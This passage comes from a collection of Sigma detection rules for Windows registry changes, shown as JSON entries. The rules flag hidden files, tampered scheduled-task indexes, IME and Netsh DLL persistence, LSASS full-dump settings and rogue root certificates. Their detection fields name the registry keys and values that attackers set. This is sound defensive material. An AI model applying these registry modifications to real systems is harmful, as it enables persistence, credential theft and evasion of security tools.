    "content": "title: Registry Modification to Hidden File Extension\nid: 5df86130-4e95-4a54-90f7-26541b40aec2\nstatus: test\ndescription: Hides the file extension through modification of the registry\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-1---modify-registry-of-current-user-profile---cmd\n    - https://unit42.paloaltonetworks.com/ransomware-families/\n    - https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A\nauthor: frack113\ndate: 2022-01-22\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.t1137\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_HideFileExt:\n        TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt'\n        Details: 'DWORD (0x00000001)'\n    selection_Hidden:\n        TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden'\n        Details: 'DWORD (0x00000002)'\n    condition: 1 of selection_*\nfalsepositives:\n    - Administrative scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_hide_file.yml",
    "content": "title: Displaying Hidden Files Feature Disabled\nid: 5a5152f1-463f-436b-b2f5-8eceb3964b42\nstatus: test\ndescription: |\n    Detects modifications to the \"Hidden\" and \"ShowSuperHidden\" explorer registry values in order to disable showing of hidden files and system files.\n    This technique is abused by several malware families to hide their files from normal users.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-8---hide-files-through-registry\nauthor: frack113\ndate: 2022-04-02\nmodified: 2024-03-26\ntags:\n    - attack.defense-evasion\n    - attack.t1564.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith:\n            - '\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden'\n            - '\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_hide_function_user.yml",
    "content": "title: Registry Hide Function from User\nid: 5a93eb65-dffa-4543-b761-94aa60098fb6\nstatus: test\ndescription: Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md\nauthor: frack113\ndate: 2022-03-18\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_set_1:\n        TargetObject|endswith:\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideClock'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCAHealth'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCANetwork'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCAPower'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCAVolume'\n        Details: 'DWORD (0x00000001)'\n    selection_set_0:\n        TargetObject|endswith:\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowInfoTip'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowCompColor'\n        Details: 'DWORD (0x00000000)'\n    condition: 1 of selection_set_*\nfalsepositives:\n    - Legitimate admin script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml",
    "content": "title: Hide Schedule Task Via Index Value Tamper\nid: 5b16df71-8615-4f7f-ac9b-6c43c0509e61\nrelated:\n    - id: acd74772-5f88-45c7-956b-6a7b36c294d2\n      type: similar\n    - id: 526cc8bc-1cdc-48ad-8b26-f19bff969cec\n      type: similar\nstatus: test\ndescription: |\n  Detects when the \"index\" value of a scheduled task is modified from the registry\n  Which effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\nreferences:\n    - https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-26\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1562\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains|all:\n            - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\'\n            - 'Index'\n        Details: DWORD (0x00000000)\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_hvci_disallowed_images.yml",
    "content": "title: Driver Added To Disallowed Images In HVCI - Registry\nid: 555155a2-03bf-4fe7-af74-d176b3fdbe16\nrelated:\n    - id: 44cee399-f6b1-45cc-a87c-ea14c6064d6b\n      type: similar\nstatus: test\ndescription: |\n    Detects changes to the \"HVCIDisallowedImages\" registry value to potentially add a driver to the list, in order to prevent it from loading.\nreferences:\n    - https://github.com/yardenshafir/conference_talks/blob/3de1f5d7c02656c35117f067fbff0a219c304b09/OffensiveCon_2023_Your_Mitigations_are_My_Opportunities.pdf\n    - https://x.com/yarden_shafir/status/1822667605175324787\nauthor: Nasreddine Bencherchali (Nextron Systems), Omar Khaled (@beacon_exe)\ndate: 2023-12-05\nmodified: 2024-08-21\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains|all:\n            - '\\Control\\CI\\'\n            - '\\HVCIDisallowedImages'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of this key would also trigger this. Investigate the driver being added and make sure its intended\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_ie_security_zone_protocol_defaults_downgrade.yml",
    "content": "title: IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols\nid: 3fd4c8d7-8362-4557-a8e6-83b29cc0d724\nrelated:\n    - id: 10344bb3-7f65-46c2-b915-2d00d47be5b0\n      type: similar\nstatus: test\ndescription: |\n    Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the \"HTTP\" and \"HTTPS\" protocols to point to the \"My Computer\" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.\nreferences:\n    - https://twitter.com/M_haggis/status/1699056847154725107\n    - https://twitter.com/JAMESWT_MHT/status/1699042827261391247\n    - https://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries\n    - https://www.virustotal.com/gui/file/339ff720c74dc44265b917b6d3e3ba0411d61f3cd3c328e9a2bae81592c8a6e5/content\nauthor: Nasreddine Bencherchali (Nextron Systems), Michael Haag (idea)\ndate: 2023-09-05\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|contains: '\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults'\n        TargetObject|endswith:\n            - '\\http'\n            - '\\https'\n        Details|contains: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_ime_non_default_extension.yml",
    "content": "title: Uncommon Extension In Keyboard Layout IME File Registry Value\nid: b888e3f2-224d-4435-b00b-9dd66e9ea1f1\nrelated:\n    - id: 9d8f9bb8-01af-4e15-a3a2-349071530530\n      type: derived\nstatus: test\ndescription: |\n    Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message.\n    Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named \"Ime File\" with a DLL path.\n    IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.\nreferences:\n    - https://www.linkedin.com/pulse/guntior-story-advanced-bootkit-doesnt-rely-windows-disk-baranov-wue8e/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-11-21\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|contains|all:\n            - '\\Control\\Keyboard Layouts\\'\n            - 'Ime File'\n    filter_main_known_extension:\n        Details|endswith: '.ime'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_ime_suspicious_paths.yml",
    "content": "title: Suspicious Path In Keyboard Layout IME File Registry Value\nid: 9d8f9bb8-01af-4e15-a3a2-349071530530\nrelated:\n    - id: b888e3f2-224d-4435-b00b-9dd66e9ea1f1\n      type: derived\nstatus: test\ndescription: |\n    Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message.\n    Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named \"Ime File\" with a DLL path.\n    IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.\nreferences:\n    - https://www.linkedin.com/pulse/guntior-story-advanced-bootkit-doesnt-rely-windows-disk-baranov-wue8e/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-11-21\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection_registry:\n        TargetObject|contains|all:\n            - '\\Control\\Keyboard Layouts\\'\n            - 'Ime File'\n    selection_folders_1:\n        Details|contains:\n            - ':\\Perflogs\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\AppData\\Roaming\\'\n            - '\\Temporary Internet'\n    selection_folders_2:\n        - Details|contains|all:\n              - ':\\Users\\'\n              - '\\Favorites\\'\n        - Details|contains|all:\n              - ':\\Users\\'\n              - '\\Favourites\\'\n        - Details|contains|all:\n              - ':\\Users\\'\n              - '\\Contacts\\'\n    condition: selection_registry and 1 of selection_folders_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_install_root_or_ca_certificat.yml",
    "content": "title: New Root or CA or AuthRoot Certificate to Store\nid: d223b46b-5621-4037-88fe-fda32eead684\nstatus: test\ndescription: Detects the addition of new root, CA or AuthRoot certificates to the Windows registry\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md#atomic-test-6---add-root-certificate-to-currentuser-certificate-store\n    - https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec\nauthor: frack113\ndate: 2022-04-04\nmodified: 2023-08-17\ntags:\n    - attack.impact\n    - attack.t1490\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\SOFTWARE\\Microsoft\\SystemCertificates\\Root\\Certificates\\'\n            - '\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates\\'\n            - '\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates\\'\n            - '\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\'\n            - '\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates\\'\n            - '\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates\\'\n            - '\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\'\n            - '\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\'\n            - '\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\AuthRoot\\Certificates\\'\n        TargetObject|endswith: '\\Blob'\n        Details: 'Binary Data'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_internet_explorer_disable_first_run_customize.yml",
    "content": "title: Internet Explorer DisableFirstRunCustomize Enabled\nid: ab567429-1dfb-4674-b6d2-979fd2f9d125\nstatus: test\ndescription: |\n    Detects changes to the Internet Explorer \"DisableFirstRunCustomize\" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows.\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf\n    - https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/\n    - https://admx.help/?Category=InternetExplorer&Policy=Microsoft.Policies.InternetExplorer::NoFirstRunCustomise\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-16\nmodified: 2025-10-07\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|endswith: '\\Microsoft\\Internet Explorer\\Main\\DisableFirstRunCustomize'\n        Details:\n            - 'DWORD (0x00000001)' # Home Page\n            - 'DWORD (0x00000002)' # Welcome To IE\n    filter_main_generic:\n        Image:\n            - 'C:\\Windows\\explorer.exe'\n            - 'C:\\Windows\\System32\\ie4uinit.exe'\n    filter_optional_avira:\n        Image|contains|all:\n            - '\\Temp\\'\n            - '\\.cr\\avira_'\n        Details|contains: 'DWORD (0x00000001)'\n    filter_optional_foxit:\n        Image:\n            - 'C:\\Program Files (x86)\\Foxit Software\\Foxit PDF Reader\\FoxitPDFReader.exe'\n            - 'C:\\Program Files\\Foxit Software\\Foxit PDF Reader\\FoxitPDFReader.exe'\n        Details|contains: 'DWORD (0x00000001)'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - As this is controlled by group policy as well as user settings. Some false positives may occur.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_legalnotice_susp_message.yml",
    "content": "title: Potential Ransomware Activity Using LegalNotice Message\nid: 8b9606c9-28be-4a38-b146-0e313cc232c1\nstatus: test\ndescription: Detect changes to the \"LegalNoticeCaption\" or \"LegalNoticeText\" registry values where the message set contains keywords often used in ransomware ransom messages\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1491.001/T1491.001.md\nauthor: frack113\ndate: 2022-12-11\nmodified: 2023-08-17\ntags:\n    - attack.impact\n    - attack.t1491.001\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LegalNoticeCaption'\n            - '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LegalNoticeText'\n        Details|contains:\n            - 'encrypted'\n            - 'Unlock-Password'\n            - 'paying'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml",
    "content": "title: Lolbas OneDriveStandaloneUpdater.exe Proxy Download\nid: 3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d\nstatus: test\ndescription: |\n    Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\n    anomalous executables with suspicious arguments. The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/\nauthor: frack113\ndate: 2022-05-28\nmodified: 2023-08-17\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\OneDrive\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_lsa_disablerestrictedadmin.yml",
    "content": "title: RestrictedAdminMode Registry Value Tampering\nid: d6ce7ebd-260b-4323-9768-a9631c8d4db2\nrelated:\n    - id: 28ac00d6-22d9-4a3c-927f-bbd770104573 # process_creation\n      type: similar\nstatus: test\ndescription: |\n    Detects changes to the \"DisableRestrictedAdmin\" registry value in order to disable or enable RestrictedAdmin mode.\n    RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\n    This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/a8e3cf63e97b973a25903d3df9fd55da6252e564/atomics/T1112/T1112.md\n    - https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx\nauthor: frack113\ndate: 2023-01-13\nmodified: 2024-08-23\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|endswith: 'System\\CurrentControlSet\\Control\\Lsa\\DisableRestrictedAdmin'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_lsass_usermode_dumping.yml",
    "content": "title: Lsass Full Dump Request Via DumpType Registry Settings\nid: 33efc23c-6ea2-4503-8cfe-bdf82ce8f719\nstatus: test\ndescription: Detects the setting of the \"DumpType\" registry value to \"2\" which stands for a \"Full Dump\". Technique such as LSASS Shtinkering requires this value to be \"2\" in order to dump LSASS.\nreferences:\n    - https://github.com/deepinstinct/Lsass-Shtinkering\n    - https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps\n    - https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf\nauthor: '@pbssubhash'\ndate: 2022-12-08\nmodified: 2023-08-17\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\DumpType'\n            - '\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\lsass.exe\\DumpType'\n        Details: 'DWORD (0x00000002)' # Full Dump\n    condition: selection\nfalsepositives:\n    - Legitimate application that needs to do a full dump of their process\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_net_cli_ngenassemblyusagelog.yml",
    "content": "title: NET NGenAssemblyUsageLog Registry Key Tamper\nid: 28036918-04d3-423d-91c0-55ecf99fb892\nstatus: test\ndescription: |\n  Detects changes to the NGenAssemblyUsageLog registry key.\n  .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\n  By simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\nreferences:\n    - https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/\nauthor: frack113\ndate: 2022-11-18\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|endswith: 'SOFTWARE\\Microsoft\\.NETFramework\\NGenAssemblyUsageLog'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_netsh_help_dll_persistence_susp_location.yml",
    "content": "title: New Netsh Helper DLL Registered From A Suspicious Location\nid: e7b18879-676e-4a0e-ae18-27039185a8e7\nrelated:\n    - id: 56321594-9087-49d9-bf10-524fe8479452\n      type: similar\n    - id: c90362e0-2df3-4e61-94fe-b37615814cb1\n      type: similar\nstatus: test\ndescription: |\n    Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper\nreferences:\n    - https://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll\n    - https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-11-28\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.007\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_target:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\NetSh'\n    selection_folders_1:\n        Details|contains:\n            - ':\\Perflogs\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\Temporary Internet'\n    selection_folders_2:\n        - Details|contains|all:\n              - ':\\Users\\'\n              - '\\Favorites\\'\n        - Details|contains|all:\n              - ':\\Users\\'\n              - '\\Favourites\\'\n        - Details|contains|all:\n              - ':\\Users\\'\n              - '\\Contacts\\'\n        - Details|contains|all:\n              - ':\\Users\\'\n              - '\\Pictures\\'\n    condition: selection_target and 1 of selection_folders_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_netsh_helper_dll_potential_persistence.yml",
    "content": "title: Potential Persistence Via Netsh Helper DLL - Registry\nid: c90362e0-2df3-4e61-94fe-b37615814cb1\nrelated:\n    - id: 56321594-9087-49d9-bf10-524fe8479452\n      type: similar\n    - id: e7b18879-676e-4a0e-ae18-27039185a8e7\n      type: similar\nstatus: test\ndescription: |\n    Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper\nreferences:\n    - https://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll\n    - https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/\nauthor: Anish Bogati\ndate: 2023-11-28\nmodified: 2025-10-08\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.007\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\NetSh'\n        Details|contains: '.dll'\n    filter_main_poqexec:\n        Image: 'C:\\Windows\\System32\\poqexec.exe'\n        Details:\n            - 'ipmontr.dll'\n            - 'iasmontr.dll'\n            - 'ippromon.dll'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate helper added by different programs and the OS\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_new_application_appcompat.yml",
    "content": "title: New Application in AppCompat\nid: 60936b49-fca0-4f32-993d-7415edcf9a5d\nstatus: test\ndescription: A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.\nreferences:\n    - https://github.com/OTRF/detection-hackathon-apt29/issues/1\n    - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/1.A.1_DFD6A782-9BDB-4550-AB6B-525E825B095E.md\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-05-02\nmodified: 2023-08-17\ntags:\n    - attack.execution\n    - attack.t1204.002\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|contains: '\\AppCompatFlags\\Compatibility Assistant\\Store\\'\n    condition: selection\nfalsepositives:\n    - This rule is to explore new applications on an endpoint. False positives depends on the organization.\n    - Newly setup system.\n    - Legitimate installation of new application.\nlevel: informational\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_new_network_provider.yml",
    "content": "title: Potential Credential Dumping Attempt Using New NetworkProvider - REG\nid: 0442defa-b4a2-41c9-ae2c-ea7042fc4701\nrelated:\n    - id: baef1ec6-2ca9-47a3-97cc-4cf2bda10b77\n      type: similar\nstatus: test\ndescription: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it\nreferences:\n    - https://learn.microsoft.com/en-us/troubleshoot/windows-client/setup-upgrade-and-drivers/network-provider-settings-removed-in-place-upgrade\n    - https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-23\nmodified: 2023-08-17\ntags:\n    - attack.credential-access\n    - attack.t1003\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains|all:\n            - '\\System\\CurrentControlSet\\Services\\'\n            - '\\NetworkProvider'\n    filter:\n        TargetObject|contains:\n            - '\\System\\CurrentControlSet\\Services\\WebClient\\NetworkProvider'\n            - '\\System\\CurrentControlSet\\Services\\LanmanWorkstation\\NetworkProvider'\n            - '\\System\\CurrentControlSet\\Services\\RDPNP\\NetworkProvider'\n            # - '\\System\\CurrentControlSet\\Services\\P9NP\\NetworkProvider' # Related to WSL remove the comment if you use WSL in your ENV\n    filter_valid_procs:\n        Image: C:\\Windows\\System32\\poqexec.exe\n    condition: selection and not 1 of filter*\nfalsepositives:\n    - Other legitimate network providers used and not filtred in this rule\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_odbc_driver_registered.yml",
    "content": "title: New ODBC Driver Registered\nid: 3390fbef-c98d-4bdd-a863-d65ed7c610dd\nstatus: test\ndescription: Detects the registration of a new ODBC driver.\nreferences:\n    - https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-23\nmodified: 2023-08-17\ntags:\n    - attack.persistence\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\SOFTWARE\\ODBC\\ODBCINST.INI\\'\n        TargetObject|endswith: '\\Driver'\n    filter_main_sqlserver:\n        TargetObject|contains: '\\SQL Server\\'\n        Details: '%WINDIR%\\System32\\SQLSRV32.dll'\n    filter_optional_office_access:\n        TargetObject|contains: '\\Microsoft Access '\n        Details|startswith: 'C:\\Progra'\n        Details|endswith: '\\ACEODBC.DLL'\n    filter_optional_office_excel:\n        TargetObject|contains: '\\Microsoft Excel Driver'\n        Details|startswith: 'C:\\Progra'\n        Details|endswith: '\\ACEODBC.DLL'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Likely\nlevel: low\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_odbc_driver_registered_susp.yml",
    "content": "title: Potentially Suspicious ODBC Driver Registered\nid: e4d22291-f3d5-4b78-9a0c-a1fbaf32a6a4\nstatus: test\ndescription: Detects the registration of a new ODBC driver where the driver is located in a potentially suspicious location\nreferences:\n    - https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-23\nmodified: 2023-08-17\ntags:\n    - attack.credential-access\n    - attack.persistence\n    - attack.t1003\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\SOFTWARE\\ODBC\\ODBCINST.INI\\'\n        TargetObject|endswith:\n            - '\\Driver'\n            - '\\Setup'\n        Details|contains:\n            - ':\\PerfLogs\\'\n            - ':\\ProgramData\\'\n            - ':\\Temp\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Registration\\CRMLog'\n            - ':\\Windows\\System32\\com\\dmp\\'\n            - ':\\Windows\\System32\\FxsTmp\\'\n            - ':\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\'\n            - ':\\Windows\\System32\\spool\\drivers\\color\\'\n            - ':\\Windows\\System32\\spool\\PRINTERS\\'\n            - ':\\Windows\\System32\\spool\\SERVERS\\'\n            - ':\\Windows\\System32\\Tasks_Migrated\\'\n            - ':\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\\'\n            - ':\\Windows\\SysWOW64\\com\\dmp\\'\n            - ':\\Windows\\SysWOW64\\FxsTmp\\'\n            - ':\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\\'\n            - ':\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\\'\n            - ':\\Windows\\Tasks\\'\n            - ':\\Windows\\Temp\\'\n            - ':\\Windows\\Tracing\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\AppData\\Roaming\\'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_office_access_vbom_tamper.yml",
